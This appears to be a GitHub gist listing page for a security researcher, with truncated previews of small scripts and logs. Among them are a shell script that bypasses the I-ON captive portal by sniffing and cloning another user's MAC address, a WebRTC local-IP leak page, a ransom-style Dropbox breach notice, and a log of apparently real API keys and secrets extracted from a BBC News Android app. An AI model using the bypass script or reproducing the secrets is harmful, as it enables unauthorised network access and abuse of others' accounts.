Program Name: 0x Project
Policy URL: https://blog.0xproject.com/announcing-the-0x-protocol-bug-bounty-b0559d2738c
Submission URL: team@0xproject.com
Program Name: 1Password Game
Piyush Raj 0x48piraj
0x48piraj
/ paying.md
Created
July 14, 2019 04:24
— forked from random-robbie/paying.md
paying bug bounty companys taken from https://github.com/disclose/disclose
0x48piraj
/ fidarkc0de.py
Created
July 22, 2019 06:01
Top 10 longest passwords from the famous darkc0de password wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| f = open('darkc0de.txt', 'r').read() | |
| wordlist = f.split() | |
| longest = max(wordlist, key=len) | |
| print("The longest password in this wordlist is %s comprising %s characters" % (longest, len(longest))) | |
| print("We always do the top 10 : ") | |
| for i in range(10): | |
| wordlist.remove(longest) | |
| longest = max(wordlist, key=len) # new longest | |
| print("%d : %s comprising %s characters" % (i+1, longest, len(longest))) |
0x48piraj
/ LoginDump.html
Created
August 14, 2019 15:45
Output of $ curl -s http://10.163.0.1/login
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>mikrotik hotspot > novirzit</title> | |
| <!-- <meta http-equiv="refresh" content="2; url=http://10.163.0.1/status"> --> | |
| <meta http-equiv="Content-Type" content="text/html; charset=windows-1257"> | |
| <meta http-equiv="pragma" content="no-cache"> | |
| <meta http-equiv="expires" content="-1"> | |
| <style type="text/css"> | |
| <!-- | |
| textarea,input,select { |
0x48piraj
/ I-ONHTTPRequest.log
Created
August 15, 2019 19:07
Vulnerable HTTP Request made by I-ON Captive Portal (https://wifilogin.myion.in)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=MM:MM:MM:SS:SS:SS&mac=B2_Hostel&interface-name=B2_Hostel HTTP/1.1 | |
| Host: wifilogin.myion.in | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 | |
| Sec-Fetch-Mode: navigate | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | |
| Sec-Fetch-Site: cross-site | |
| Referer: http://10.163.0.1/status | |
| Accept-Encoding: gzip, deflate |
0x48piraj
/ i-ONexploit.sh
Last active
August 24, 2019 09:01
Shell script to exploit vulnerable I-ON Captive Portal which depends on MAC addresses for identification. (https://wifilogin.myion.in)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| echo "Capturing various MAC addr(s) from local network for ~1 minute ...\n" | |
| wlan=`iw dev | awk '$1=="Interface"{print $2}'` | |
| tshark -a duration:100 -i $wlan -T fields -e eth.src | sort | uniq | |
| printf "\nEnter target MAC addr : " | |
| read mac | |
| ifconfig $wlan down | |
| macchanger -m $mac $wlan | |
| ifconfig $wlan up |
0x48piraj
/ phiship.html
Created
August 18, 2019 19:05
Phishing local IP address on-the-fly via javascript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html><head> | |
| <meta charset="utf-8"> | |
| <title>Network IP Address</title> | |
| </head><body> | |
| Your local IP is: <h1 id=list>-</h1> | |
| <script> | |
| var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection; | |
| if (RTCPeerConnection) (function () { | |
| var rtc = new RTCPeerConnection({iceServers:[]}); |
0x48piraj
/ DropboxCredsLeak.txt
Created
November 5, 2019 12:23
Recovered deleted dump of Dropbox credentials during my research on tracking malware campaigns. Initial dump was uploaded over (https://pastebin.com/teija5qQ)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ***** DROPBOX HACKED ***** | |
| 6,937,081 DROPBOX ACCOUNTS HACKED | |
| PHOTOS - VIDEOS - OTHER FILES | |
| MORE BITCOIN = MORE ACCOUNTS PUBLISHED ON PASTEBIN | |
| As more BTC is donated , More pastebin pastes will appear | |
| To find them, simply search for "DROPBOX HACKED" and you | |
| will see any additional pastes as they are published. | |
0x48piraj
/ output.log
Created
November 30, 2019 16:10
Output from one of my unpublished tools which extracts API keys from Android apps.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- BBC NEWS --- | |
| <string name="hockeyapp_arabic_production_secret">uEmvLI7ISged1bGkPLrqeQ</string> | |
| <string name="hockeyapp_cymru_production_key">s29lhGbwTRuwFObpBkfv1Q</string> | |
| <string name="hockeyapp_cymru_production_secret">9ELcUn_aRx6XloRKmixKww</string> | |
| <string name="hockeyapp_gnl_production_key">5uxVka7XShWhgxXRDEOX-w</string> |
0x48piraj
/ bcd-verify.py
Created
December 20, 2019 09:57
Binary Coded Decimal or BCD Numbering System Algorithm Verification
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from 'observation' | |
| zton = ['0000','0001', '0010', '0011', '0100', '0101', '0110', '0111', '1000', '1001'] | |
| def bcd(n1, n2): | |
| num = str(n1 + n2) | |
| answer = "".join([zton[int(i)] for i in num]) # bcd answer | |
| c = bin(int(n1) + int(n2))[2:].zfill(4) # bin(int(n1) + int(n2)).replace("0b","") does not formats to 4 bit binary | |
| if answer == c : | |
| print('Passed') |
0x48piraj
/ GizmodoJournalists.py
Created
March 8, 2020 14:23
Extracting Gizmodo journalists in #cybersecurity
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://gizmodo.com/tag/cybersecurity?startIndex=20 | |
| import requests | |
| import re | |
| lst=[] | |
| for qr in range(20,481,20): # 480 | |
| r = requests.get("https://gizmodo.com/tag/cybersecurity?startIndex=" + str(qr)) | |
| for i in list(set(re.findall(r'(?<=kinja.com/)[^"]*', str(r.content)))): | |
| if ""," in i: |